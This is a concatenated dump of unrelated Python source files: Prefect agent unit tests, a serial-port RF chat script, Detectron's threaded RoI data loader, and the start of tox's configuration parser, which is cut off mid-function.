post = MagicMock(return_value=MagicMock(json=MagicMock(return_value="hello")))
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
agent = Agent()
assert agent.agent_connect() is None
def test_agent_connect_handled_error(monkeypatch, cloud_api):
post = MagicMock(side_effect=Exception)
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
agent = Agent()
assert agent.agent_connect() is None
def test_on_flow_run_deploy_attempt_removes_id(monkeypatch, cloud_api):
agent = Agent()
agent.submitting_flow_runs.add("id")
agent.on_flow_run_deploy_attempt(None, "id")
assert len(agent.submitting_flow_runs) == 0
def test_agent_process(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
set_task_run_state=None,
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[
GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
future_mock = MagicMock()
executor.submit = MagicMock(return_value=future_mock)
agent = Agent()
assert agent.agent_process(executor)
assert executor.submit.called
assert future_mock.add_done_callback.called
def test_agent_process_no_runs_found(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
set_task_run_state=None,
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
agent = Agent()
assert not agent.agent_process(executor)
assert not executor.submit.called
def test_agent_logs_flow_run_exceptions(monkeypatch, caplog, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(write_run_logs=MagicMock(success=True)))
)
client = MagicMock()
client.return_value.write_run_logs = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", MagicMock(return_value=client))
agent = Agent()
agent.deploy_flow = MagicMock(side_effect=Exception("Error Here"))
agent.deploy_and_update_flow_run(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
)
assert client.write_run_logs.called
client.write_run_logs.assert_called_with(
[dict(flow_run_id="id", level="ERROR", message="Error Here", name="agent")]
)
assert "Logging platform error for flow run" in caplog.text
def test_agent_process_raises_exception_and_logs(monkeypatch, cloud_api):
client = MagicMock()
client.return_value.graphql.side_effect = ValueError("Error")
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
agent = Agent()
with pytest.raises(Exception):
agent.agent_process(executor, "id")
assert client.write_run_log.called
def test_agent_start_max_polls(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=1)
agent.start()
assert on_shutdown.called
assert agent_process.called
assert heartbeat.called
def test_agent_start_max_polls_count(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=2)
agent.start()
assert on_shutdown.call_count == 1
assert agent_process.call_count == 2
assert heartbeat.call_count == 2
def test_agent_start_max_polls_zero(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=0)
agent.start()
assert on_shutdown.call_count == 1
assert agent_process.call_count == 0
assert heartbeat.call_count == 0
def test_agent_registration_and_id(monkeypatch, cloud_api):
monkeypatch.setattr("prefect.agent.agent.Agent._verify_token", MagicMock())
monkeypatch.setattr(
"prefect.agent.agent.Client.register_agent", MagicMock(return_value="ID")
)
agent = Agent(max_polls=1)
agent.start()
assert agent._register_agent() == "ID"
assert agent.client._attached_headers == {"X-PREFECT-AGENT-ID": "ID"}
def test_agent_health_check(cloud_api):
requests = pytest.importorskip("requests")
class TestAgent(Agent):
def agent_connect(self):
pass
with socket.socket() as sock:
sock.bind(("", 0))
port = sock.getsockname()[1]
agent = TestAgent(agent_address=f"http://127.0.0.1:{port}", max_polls=1)
agent.setup()
# May take a sec for the api server to startup
for attempt in range(5):
try:
resp = requests.get(f"http://127.0.0.1:{port}/api/health")
break
except Exception:
time.sleep(0.1)
else:
agent.cleanup()
assert False, "Failed to connect to health check"
assert resp.status_code == 200
agent.cleanup()
assert not agent._api_server_thread.is_alive()
def test_agent_poke_api(monkeypatch, runner_token, cloud_api):
import threading
requests = pytest.importorskip("requests")
def _poke_agent(agent_address):
# May take a sec for the api server to startup
for attempt in range(5):
try:
resp = requests.get(f"{agent_address}/api/health")
break
except Exception:
time.sleep(0.1)
else:
assert False, "Failed to connect to health check"
assert resp.status_code == 200
# Agent API is now available. Poke agent to start processing.
requests.get(f"{agent_address}/api/poke")
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
with socket.socket() as sock:
sock.bind(("", 0))
port = sock.getsockname()[1]
agent_address = f"http://127.0.0.1:{port}"
# Poke agent in separate thread as main thread is blocked by main agent
# process waiting for loop interval to complete.
poke_agent_thread = threading.Thread(target=_poke_agent, args=(agent_address,))
poke_agent_thread.start()
agent_start_time = time.time()
agent = Agent(agent_address=agent_address, max_polls=1)
# Override loop interval to 5 seconds.
agent.start(_loop_intervals={0: 5.0})
agent_stop_time = time.time()
agent.cleanup()
assert agent_stop_time - agent_start_time < 5.0
assert not agent._api_server_thread.is_alive()
assert heartbeat.call_count == 1
assert agent_process.call_count == 1
assert agent_connect.call_count == 1
|
chat.py
|
#!/usr/bin/env python3
# Import libraries we need
import time
import serial
import threading
import sys
# Sets up the serial port for our RF Modules
ser = serial.Serial(
port = '/dev/ttyS0',
baudrate = 9600,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS,
timeout = 1
)
# Creates the global variable needed for later
message = ''
# Function to get and decode the message
def readAndDecode():
global message
x = ser.readline()
while (x.decode() == ''):
x = ser.readline()
message = x.decode()
def send(arg1):
# Transmit your message
print('Transmitting...')
while 1:
s = sys.stdin.readline()
ser.write(s.encode())
time.sleep(0.25)
def receive(arg1):
global message
print('Receiving...')
while 1:
# Get the decoded message and format it
readAndDecode()
message = message.replace('\n', '')
print(message)
time.sleep(0.25)
# Create and start the threads
sendThread = threading.Thread(name='getAndSave', target=send, args=(1,))
receiveThread = threading.Thread(name='action', target=receive, args=(1,))
sendThread.start()
receiveThread.start()
|
loader.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
minibatch queue. Each GPU has an enqueue thread that pulls a minibatch off the
minibatch queue, feeds the minibatch blobs into the workspace, and then runs
an EnqueueBlobsOp to place the minibatch blobs into the GPU's blobs queue.
During each fprop the first thing the network does is run a DequeueBlobsOp
in order to populate the workspace with the blobs from a queued minibatch.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import deque
from collections import OrderedDict
import logging
import numpy as np
import queue as Queue
import signal
import threading
import time
import uuid
from caffe2.python import core, workspace
from detectron.core.config import cfg
from detectron.roi_data.minibatch import get_minibatch
from detectron.roi_data.minibatch import get_minibatch_blob_names
from detectron.utils.coordinator import coordinated_get
from detectron.utils.coordinator import coordinated_put
from detectron.utils.coordinator import Coordinator
import detectron.utils.c2 as c2_utils
logger = logging.getLogger(__name__)
class RoIDataLoader(object):
def __init__(
self,
roidb,
num_loaders=4,
minibatch_queue_size=64,
blobs_queue_capacity=8
):
self._roidb = roidb
self._lock = threading.Lock()
self._perm = deque(range(len(self._roidb)))
self._cur = 0 # _perm cursor
# The minibatch queue holds prepared training data in host (CPU) memory
# When training with N > 1 GPUs, each element in the minibatch queue
# is actually a partial minibatch which contributes 1 / N of the
# examples to the overall minibatch
self._minibatch_queue = Queue.Queue(maxsize=minibatch_queue_size)
self._blobs_queue_capacity = blobs_queue_capacity
# Random queue name in case one instantiates multiple RoIDataLoaders
self._loader_id = uuid.uuid4()
self._blobs_queue_name = 'roi_blobs_queue_{}'.format(self._loader_id)
# Loader threads construct (partial) minibatches and put them on the
# minibatch queue
self._num_loaders = num_loaders
self._num_gpus = cfg.NUM_GPUS
self.coordinator = Coordinator()
self._output_names = get_minibatch_blob_names()
self._shuffle_roidb_inds()
self.create_threads()
def minibatch_loader_thread(self):
"""Load mini-batches and put them onto the mini-batch queue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
blobs = self.get_next_minibatch()
# Blobs must be queued in the order specified by
# self.get_output_names
ordered_blobs = OrderedDict()
for key in self.get_output_names():
assert blobs[key].dtype in (np.int32, np.float32), \
'Blob {} of dtype {} must have dtype of ' \
'np.int32 or np.float32'.format(key, blobs[key].dtype)
ordered_blobs[key] = blobs[key]
coordinated_put(
self.coordinator, self._minibatch_queue, ordered_blobs
)
logger.info('Stopping mini-batch loading thread')
def enqueue_blobs_thread(self, gpu_id, blob_names):
"""Transfer mini-batches from a mini-batch queue to a BlobsQueue."""
with self.coordinator.stop_on_exception():
while not self.coordinator.should_stop():
if self._minibatch_queue.qsize() == 0:
logger.warning('Mini-batch queue is empty')
blobs = coordinated_get(self.coordinator, self._minibatch_queue)
self.enqueue_blobs(gpu_id, blob_names, blobs.values())
logger.debug(
'batch queue size {}'.format(self._minibatch_queue.qsize())
)
logger.info('Stopping enqueue thread')
def get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch. Thread safe."""
valid = False
while not valid:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs, valid = get_minibatch(minibatch_db)
return blobs
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb. Not thread safe."""
if cfg.TRAIN.ASPECT_GROUPING:
widths = np.array([r['width'] for r in self._roidb])
heights = np.array([r['height'] for r in self._roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
horz_inds = np.random.permutation(horz_inds)
vert_inds = np.random.permutation(vert_inds)
mb = cfg.TRAIN.IMS_PER_BATCH
horz_inds = horz_inds[:(len(horz_inds) // mb) * mb]
vert_inds = vert_inds[:(len(vert_inds) // mb) * mb]
inds = np.hstack((horz_inds, vert_inds))
inds = np.reshape(inds, (-1, mb))
row_perm = np.random.permutation(np.arange(inds.shape[0]))
inds = np.reshape(inds[row_perm, :], (-1, ))
self._perm = inds
else:
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._perm = deque(self._perm)
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch. Thread safe."""
with self._lock:
# We use a deque and always take the *first* IMS_PER_BATCH items
# followed by *rotating* the deque so that we see fresh items
# each time. If the length of _perm is not divisible by
# IMS_PER_BATCH, then we end up wrapping around the permutation.
db_inds = [self._perm[i] for i in range(cfg.TRAIN.IMS_PER_BATCH)]
self._perm.rotate(-cfg.TRAIN.IMS_PER_BATCH)
self._cur += cfg.TRAIN.IMS_PER_BATCH
if self._cur >= len(self._perm):
self._shuffle_roidb_inds()
return db_inds
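# Added worked example (not in the original): with _perm = deque([0, 1, 2, 3, 4])
# and IMS_PER_BATCH = 2, successive calls return [0, 1], [2, 3], [4, 0] (the
# deque is rotated left by 2 each time); once _cur reaches len(_perm) the
# permutation is reshuffled.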
def get_output_names(self):
return self._output_names
def enqueue_blobs(self, gpu_id, blob_names, blobs):
"""Put a mini-batch on a BlobsQueue."""
assert len(blob_names) == len(blobs)
t = time.time()
dev = c2_utils.CudaDevice(gpu_id)
queue_name = 'gpu_{}/{}'.format(gpu_id, self._blobs_queue_name)
blob_names = ['gpu_{}/{}'.format(gpu_id, b) for b in blob_names]
for (blob_name, blob) in zip(blob_names, blobs):
workspace.FeedBlob(blob_name, blob, device_option=dev)
logger.debug(
'enqueue_blobs {}: workspace.FeedBlob: {}'.
format(gpu_id, time.time() - t)
)
t = time.time()
op = core.CreateOperator(
'SafeEnqueueBlobs', [queue_name] + blob_names,
blob_names + [queue_name + '_enqueue_status'],
device_option=dev
)
workspace.RunOperatorOnce(op)
logger.debug(
'enqueue_blobs {}: workspace.RunOperatorOnce: {}'.
format(gpu_id, time.time() - t)
)
def create_threads(self):
# Create mini-batch loader threads, each of which builds mini-batches
# and places them into a queue in CPU memory
self._workers = [
threading.Thread(target=self.minibatch_loader_thread)
for _ in range(self._num_loaders)
]
# Create one BlobsQueue per GPU
# (enqueue_blob_names are unscoped)
enqueue_blob_names = self.create_blobs_queues()
# Create one enqueuer thread per GPU
self._enqueuers = [
threading.Thread(
target=self.enqueue_blobs_thread,
args=(gpu_id, enqueue_blob_names)
) for gpu_id in range(self._num_gpus)
]
def start(self, prefill=False):
for w in self._workers + self._enqueuers:
w.start()
if prefill:
logger.info('Pre-filling mini-batch queue...')
while not self._minibatch_queue.full():
logger.info(
' [{:d}/{:d}]'.format(
self._minibatch_queue.qsize(),
self._minibatch_queue.maxsize
)
)
time.sleep(0.1)
# Detect failure and shutdown
if self.coordinator.should_stop():
self.shutdown()
break
def shutdown(self):
self.coordinator.request_stop()
self.coordinator.wait_for_stop()
self.close_blobs_queues()
for w in self._workers + self._enqueuers:
w.join()
def create_blobs_queues(self):
"""Create one BlobsQueue for each GPU to hold mini-batches."""
for gpu_id in range(self._num_gpus):
with c2_utils.GpuNameScope(gpu_id):
workspace.RunOperatorOnce(
core.CreateOperator(
'CreateBlobsQueue', [], [self._blobs_queue_name],
num_blobs=len(self.get_output_names()),
capacity=self._blobs_queue_capacity
)
)
return self.create_enqueue_blobs()
def close_blobs_queues(self):
"""Close a BlobsQueue."""
for gpu_id in range(self._num_gpus):
with core.NameScope('gpu_{}'.format(gpu_id)):
workspace.RunOperatorOnce(
core.CreateOperator(
'CloseBlobsQueue', [self._blobs_queue_name], []
)
)
def create_enqueue_blobs(self):
blob_names = self.get_output_names()
enqueue_blob_names = [
'{}_enqueue_{}'.format(b, self._loader_id) for b in blob_names
]
for gpu_id in range(self._num_gpus):
with c2_utils.NamedCudaScope(gpu_id):
for blob in enqueue_blob_names:
workspace.CreateBlob(core.ScopedName(blob))
return enqueue_blob_names
def register_sigint_handler(self):
def signal_handler(signal, frame):
logger.info(
'SIGINT: Shutting down RoIDataLoader threads and exiting...'
)
self.shutdown()
signal.signal(signal.SIGINT, signal_handler)
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
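# Added usage sketch (hypothetical, not from the original source): a plugin's
# tox_addoption hook could register an ini option such as
#   parser.add_testenv_attribute(
#       name="my_flag", type="bool", default=False,
#       postprocess=lambda testenv_config, value: value
#       or testenv_config.config.option.verbose_level > 0,
#   )
# and the processed value is then available as ``testenv_config.my_flag``.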
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
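# Added worked example (assuming "-i" and "--index-url" are listed in
# tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT / INSTALL_LONG_OPTIONS_ARGUMENT):
#   "-i https://pypi.example.org/simple"          -> "-ihttps://pypi.example.org/simple"
#   "--index-url https://pypi.example.org/simple" -> "--index-url=https://pypi.example.org/simple"
# so the later subprocess call to pip does not split the option from its value.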
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if no tox config file, we now need to do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
